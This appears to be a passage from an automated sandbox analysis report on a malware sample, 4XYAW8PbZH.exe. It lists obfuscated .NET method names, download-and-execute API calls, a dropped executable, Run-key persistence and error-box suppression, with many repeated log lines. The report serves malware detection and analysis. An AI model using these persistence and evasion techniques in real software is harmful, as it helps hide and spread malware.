                Source: 0.2.4XYAW8PbZH.exe.3a9f740.5.raw.unpack, SMVV3L4F0JhXJNHiOK.cs High entropy of concatenated method names: 'CMLd99PMDt', 'KGld59TtAp', 'Gbjd4MXtxe', 'CWNdVMLJ9k', 'w66dnuB787', 'H62dCQZmaH', 'E5Edy82euB', 'pGhdKuESCb', 'HqddQRJXgR', 'yyRdlVUQeE'
                Source: 0.2.4XYAW8PbZH.exe.3a9f740.5.raw.unpack, yWN2RNBFVEbJiQusUqV.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'wJZ78tv2RX', 'UuJ75CRJyN', 'fTq7M7DOw0', 'sl7744RB62', 'uXL7VnrVXx', 'w5N7GeKCXV', 'ClH7YoW6y1'
                Source: 0.2.4XYAW8PbZH.exe.3a9f740.5.raw.unpack, F2AUD4MkIbgrqWMk6a.cs High entropy of concatenated method names: 'm6DNsmcgR1', 'zuKNOXlcc5', 'qweNRU0tDf', 'YHdNnabryD', 'e45NyOHpd2', 'n6nNKE1a8d', 'BtcNlbkj4a', 'DbMNp9IQUY', 'nPAN9F9P1f', 'JJFN83Y4Ky'
                Source: 0.2.4XYAW8PbZH.exe.3a9f740.5.raw.unpack, rCZtm2XybO116ly9vS.cs High entropy of concatenated method names: 'lH2fdSOK5m', 'Maqf1bTyMY', 'c1Hff1AjqB', 'iRafch2c9o', 'DV3fTmw8tK', 'N5Ifr6Ce8p', 'Dispose', 'Ig1JZnfLCG', 'WXxJEDfKsG', 'HKXJHYwP44'
                Source: 0.2.4XYAW8PbZH.exe.3a9f740.5.raw.unpack, cliYwLYym59iuPZqLi.cs High entropy of concatenated method names: 'rwS1PFgJy3', 'fNX1hl7y0n', 'ToString', 'XP31ZDrMSt', 'uq11EPnlEb', 'JrW1HoPI1N', 'EVd1wXXhoS', 'gJp13PCgTm', 'PTS1uIG4bP', 'tEH1bWqpmu'
                Source: 0.2.4XYAW8PbZH.exe.3a9f740.5.raw.unpack, bJbHCUx5N9DTZH0CVI.cs High entropy of concatenated method names: 'OCZwq9V76m', 'sPBwiaLpcs', 'xfeHCAOQkP', 'q3pHyrNZ4L', 'JGMHKEXG2j', 'OpmHQWKtVf', 'GQVHlnxpN5', 'AJdHpZoOZK', 'Oo4Hadb6LO', 'WRwH9K3R2p'
                Source: 0.2.4XYAW8PbZH.exe.3a9f740.5.raw.unpack, pODuZav9OGdqpNjHpj.csHigh entropy of concatenated method names: 'b5cfR71syL', 'C8ffne1OYp', 'CNefCBt9DS', 'vNMfyqdoP8', 'XejfKLULKv', 'NK4fQRBfLi', 'xHiflw82dI', 'HdHfpahY8d', 'ubwfarPh8M', 'GHYf94Vubs'
                Source: 0.2.4XYAW8PbZH.exe.3a9f740.5.raw.unpack, bX7HmQt2nvTKvcBjMt.csHigh entropy of concatenated method names: 'CoFBuZ6hBX', 'Ob9Bbsnu0U', 'OTLBPB6H3c', 'IbABhHBJbH', 'h0CBdVI4Ik', 'sWQBIjI599', 'fNZFNio9oDWep87ryH', 'qTndNdppOX47cgbn3x', 'W9MBB3sHWl', 'Il7BoaRHbM'
                Source: 0.2.4XYAW8PbZH.exe.3a9f740.5.raw.unpack, li9XWxlVpTEWtsPVb9.csHigh entropy of concatenated method names: 'qIsuZvmgQY', 'cjNuHmER4j', 'Rcbu3nvF66', 'SJm3kApVE5', 'HGH3zEH7fq', 'atvuFTgIBq', 'SnvuBrNmbL', 'PNkuWRk6kF', 'BohuowZMa1', 'gdLutuUi9C'
                Source: 0.2.4XYAW8PbZH.exe.3a9f740.5.raw.unpack, WuxHU5nUKjLfJqY2HB.csHigh entropy of concatenated method names: 'jnvRl20MYkDGu7YaC9T', 'xS6gSE0iCKxHtvYY7XI', 'Eou3J20NrF', 'wl33f1OqNd', 'AMD37Kmplf', 'NCns6L0kqUGhOjM9yKK', 'uKERJb09L6iSUMZVWZl'
                Source: 0.2.4XYAW8PbZH.exe.73d0000.8.raw.unpack, VVDsp5z0h3ueCBhMHI.csHigh entropy of concatenated method names: 'uIn7A4c5c4', 'cKd7sP29J8', 'PVJ7OPUjgm', 'GOt7RTbFRX', 'fRq7nLo8jY', 'DsO7yXYm8F', 'jfG7KvFoCV', 'Myv7ryJQZt', 'Xsw76AFOO9', 'Kyv7jAnZ5D'
                Source: 0.2.4XYAW8PbZH.exe.73d0000.8.raw.unpack, JcP3CXbCj2MePxFw4t.csHigh entropy of concatenated method names: 'QoAogqc15s', 'e0foZWP9NT', 'rvLoE54nKf', 'xm2oHsaGlJ', 'UWSowSuwci', 'sO3o34FuNi', 'rGjouvpEx0', 'fYlobbE8aU', 'P16oDiReVp', 'WGloPIyo49'
                Source: 0.2.4XYAW8PbZH.exe.73d0000.8.raw.unpack, xIqYjAki73C3cKXD85.csHigh entropy of concatenated method names: 'mbH7H07iFW', 'cqN7w994hK', 'ar073Ob3xB', 'wGn7uSWQE6', 'Bt87fiZN8f', 'wJO7bL4K0j', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.4XYAW8PbZH.exe.73d0000.8.raw.unpack, r9CwgrmCq0iA7y8nJ9.csHigh entropy of concatenated method names: 'kmo10oA3WG', 'XF91kVnfgY', 'uD4JF8j06V', 'pS0JBFMV7N', 'IBk18L56x4', 'mwX15QL4Zw', 'FQX1MFhCAe', 'M7E14W3NRJ', 'otb1VZdwoy', 'kBj1GN1mkX'
                Source: 0.2.4XYAW8PbZH.exe.73d0000.8.raw.unpack, RIk7WQRjI599urvrYU.csHigh entropy of concatenated method names: 'fdr3ga9YYx', 'V2R3EC5bMN', 'HeQ3wmZs3A', 'F8g3uE54eo', 'axd3bC7mZl', 'bhQw2fCU0I', 'AtGwmfhcBv', 'Q91wXBbP8W', 'lZDw0CQDUh', 'XS5wvI0nGD'
                Source: 0.2.4XYAW8PbZH.exe.73d0000.8.raw.unpack, YyrH5xHV915ThCRfGa.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'xOLWv2TDtE', 'y8rWkqnK6l', 'QGkWzCEIkm', 'Ro9oF4Ba7N', 'gbNoBhb6tG', 'xbcoWtMcYZ', 'OAiooghZRU', 'nE4ApMOscsGI89RvYjD'
                Source: 0.2.4XYAW8PbZH.exe.73d0000.8.raw.unpack, XZYmxvaX0mNFxC84I7.csHigh entropy of concatenated method names: 'BCOu6animg', 'qDIujWCwOM', 'QxtueC8Dn5', 'LywuUPvaA5', 'UcluqdNTZc', 'q2RuAlnaak', 'qMhuihgE1v', 'pkkusiJKe3', 'ab7uOBwqco', 'pX1uxKqnWF'
                Source: 0.2.4XYAW8PbZH.exe.73d0000.8.raw.unpack, S7guEaWiHrCoe6iT91.csHigh entropy of concatenated method names: 'WXqeUm90M', 'jLwUZjEem', 'FrnA6jFId', 'WScicf8OE', 'v2dO8kdkD', 'INkxIPV9m', 'tcUSWTHvQbeageBmqd', 'l1LITJQyVHatQptoum', 'dIlJm2d5V', 'v0j73y1qS'
                Source: 0.2.4XYAW8PbZH.exe.73d0000.8.raw.unpack, YMJvB8OTLB6H3cybAH.csHigh entropy of concatenated method names: 'Y0hHUedI8O', 'DuGHAgvPnO', 'a8rHsj6twY', 'FJnHOgNW5o', 'aOFHdNM4AY', 'dKLHInGRiR', 'BskH1vZj2A', 'NonHJVcBa7', 'El9Hfp8FFn', 'S6MH7wg6FD'
                Source: 0.2.4XYAW8PbZH.exe.73d0000.8.raw.unpack, gUDpoRBWcGZJdJ1xBgC.csHigh entropy of concatenated method names: 'ToString', 'wVZcsWakXq', 'jadcOJnm38', 'gywcx1XbJp', 'o9dcRepSIn', 'Ud6cnPo0m9', 'V7LcCYiLhC', 'V3ccyPJWQZ', 'EWbZkW6svpOjxZ482uU', 'IjLn5e6Es8fcoPHGwnA'
                Source: 0.2.4XYAW8PbZH.exe.73d0000.8.raw.unpack, ivEyq7BBJ6wHAHZOqFG.csHigh entropy of concatenated method names: 'EkX7kVEQfu', 'RCn7z45KMv', 'WcUcFO0E4b', 'G0bcBMMhvw', 'wuEcWPrMfa', 'iK2copKFXF', 'R0TctVlhJp', 'OmrcgXN0Xy', 'JlIcZTcJCr', 'HBfcEKWTaW'
                Source: 0.2.4XYAW8PbZH.exe.73d0000.8.raw.unpack, h2W2U5GjXycDmWoFtZ.csHigh entropy of concatenated method names: 'ToString', 'lIpI8tcxTA', 'WZmInRvcb3', 'RgeIC7a36r', 'dlaIyl29RT', 'ogeIK2VhUH', 'VqFIQbFToc', 'dmeIlQabpw', 'j5RIp5t8Sg', 'lQOIaKea0i'
                Source: 0.2.4XYAW8PbZH.exe.73d0000.8.raw.unpack, aZ6hBXs8b9snu0Ud4p.csHigh entropy of concatenated method names: 'Nm8E4IbjXI', 'EIqEV2l8ky', 'OxwEG3iQdT', 'Tf8EYDstEk', 'YG0E2Elp8q', 'VBtEmHKwxS', 'Bb5EX8pUrq', 'YTvE0rHEgl', 'bRAEvLQOc6', 'jkXEk9yqPO'
                Source: 0.2.4XYAW8PbZH.exe.73d0000.8.raw.unpack, JqlCJGEi2WaZVqGLKM.csHigh entropy of concatenated method names: 'Dispose', 'E11Bv6ly9v', 'w6nWnBkput', 'm0SpG3IOGJ', 'wFOBk7NNf2', 'iinBzceRpT', 'ProcessDialogKey', 'EcIWFODuZa', 'OOGWBdqpNj', 'gpjWW6IqYj'
                Source: 0.2.4XYAW8PbZH.exe.73d0000.8.raw.unpack, zTyVhKBtEs85eROFEAZ.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'UvPLf6tnDA', 'SjxL7gbcHA', 'Nh5LcscBeV', 'NwVLLFOxAi', 'AVGLTSkgw1', 'RpALSjCKBu', 'WbGLrFtVeZ'
                Source: 0.2.4XYAW8PbZH.exe.73d0000.8.raw.unpack, SMVV3L4F0JhXJNHiOK.csHigh entropy of concatenated method names: 'CMLd99PMDt', 'KGld59TtAp', 'Gbjd4MXtxe', 'CWNdVMLJ9k', 'w66dnuB787', 'H62dCQZmaH', 'E5Edy82euB', 'pGhdKuESCb', 'HqddQRJXgR', 'yyRdlVUQeE'
                Source: 0.2.4XYAW8PbZH.exe.73d0000.8.raw.unpack, yWN2RNBFVEbJiQusUqV.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'wJZ78tv2RX', 'UuJ75CRJyN', 'fTq7M7DOw0', 'sl7744RB62', 'uXL7VnrVXx', 'w5N7GeKCXV', 'ClH7YoW6y1'
                Source: 0.2.4XYAW8PbZH.exe.73d0000.8.raw.unpack, F2AUD4MkIbgrqWMk6a.csHigh entropy of concatenated method names: 'm6DNsmcgR1', 'zuKNOXlcc5', 'qweNRU0tDf', 'YHdNnabryD', 'e45NyOHpd2', 'n6nNKE1a8d', 'BtcNlbkj4a', 'DbMNp9IQUY', 'nPAN9F9P1f', 'JJFN83Y4Ky'
                Source: 0.2.4XYAW8PbZH.exe.73d0000.8.raw.unpack, rCZtm2XybO116ly9vS.csHigh entropy of concatenated method names: 'lH2fdSOK5m', 'Maqf1bTyMY', 'c1Hff1AjqB', 'iRafch2c9o', 'DV3fTmw8tK', 'N5Ifr6Ce8p', 'Dispose', 'Ig1JZnfLCG', 'WXxJEDfKsG', 'HKXJHYwP44'
                Source: 0.2.4XYAW8PbZH.exe.73d0000.8.raw.unpack, cliYwLYym59iuPZqLi.csHigh entropy of concatenated method names: 'rwS1PFgJy3', 'fNX1hl7y0n', 'ToString', 'XP31ZDrMSt', 'uq11EPnlEb', 'JrW1HoPI1N', 'EVd1wXXhoS', 'gJp13PCgTm', 'PTS1uIG4bP', 'tEH1bWqpmu'
                Source: 0.2.4XYAW8PbZH.exe.73d0000.8.raw.unpack, bJbHCUx5N9DTZH0CVI.csHigh entropy of concatenated method names: 'OCZwq9V76m', 'sPBwiaLpcs', 'xfeHCAOQkP', 'q3pHyrNZ4L', 'JGMHKEXG2j', 'OpmHQWKtVf', 'GQVHlnxpN5', 'AJdHpZoOZK', 'Oo4Hadb6LO', 'WRwH9K3R2p'
                Source: 0.2.4XYAW8PbZH.exe.73d0000.8.raw.unpack, pODuZav9OGdqpNjHpj.csHigh entropy of concatenated method names: 'b5cfR71syL', 'C8ffne1OYp', 'CNefCBt9DS', 'vNMfyqdoP8', 'XejfKLULKv', 'NK4fQRBfLi', 'xHiflw82dI', 'HdHfpahY8d', 'ubwfarPh8M', 'GHYf94Vubs'
                Source: 0.2.4XYAW8PbZH.exe.73d0000.8.raw.unpack, bX7HmQt2nvTKvcBjMt.csHigh entropy of concatenated method names: 'CoFBuZ6hBX', 'Ob9Bbsnu0U', 'OTLBPB6H3c', 'IbABhHBJbH', 'h0CBdVI4Ik', 'sWQBIjI599', 'fNZFNio9oDWep87ryH', 'qTndNdppOX47cgbn3x', 'W9MBB3sHWl', 'Il7BoaRHbM'
                Source: 0.2.4XYAW8PbZH.exe.73d0000.8.raw.unpack, li9XWxlVpTEWtsPVb9.csHigh entropy of concatenated method names: 'qIsuZvmgQY', 'cjNuHmER4j', 'Rcbu3nvF66', 'SJm3kApVE5', 'HGH3zEH7fq', 'atvuFTgIBq', 'SnvuBrNmbL', 'PNkuWRk6kF', 'BohuowZMa1', 'gdLutuUi9C'
                Source: 0.2.4XYAW8PbZH.exe.73d0000.8.raw.unpack, WuxHU5nUKjLfJqY2HB.csHigh entropy of concatenated method names: 'jnvRl20MYkDGu7YaC9T', 'xS6gSE0iCKxHtvYY7XI', 'Eou3J20NrF', 'wl33f1OqNd', 'AMD37Kmplf', 'NCns6L0kqUGhOjM9yKK', 'uKERJb09L6iSUMZVWZl'
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_00406128 ShellExecuteW,URLDownloadToFileW,3_2_00406128
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeFile created: C:\Users\user\AppData\Roaming\Graias\graias.exeJump to dropped file

                Boot Survival

                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe - Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Rmc-O844B9
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe - Code function: 3_2_00419BD4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,3_2_00419BD4

                Hooking and other Techniques for Hiding and Protection

                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe - Code function: 3_2_0041BCF3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,3_2_0041BCF3
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe - Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe - Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe - Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
